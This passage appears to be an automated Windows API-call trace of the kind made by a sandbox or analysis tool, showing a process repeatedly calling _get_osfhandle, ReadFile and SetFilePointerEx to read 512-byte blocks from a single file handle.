liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, 
lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 
[0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 
[0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, 
lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 
[0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, 
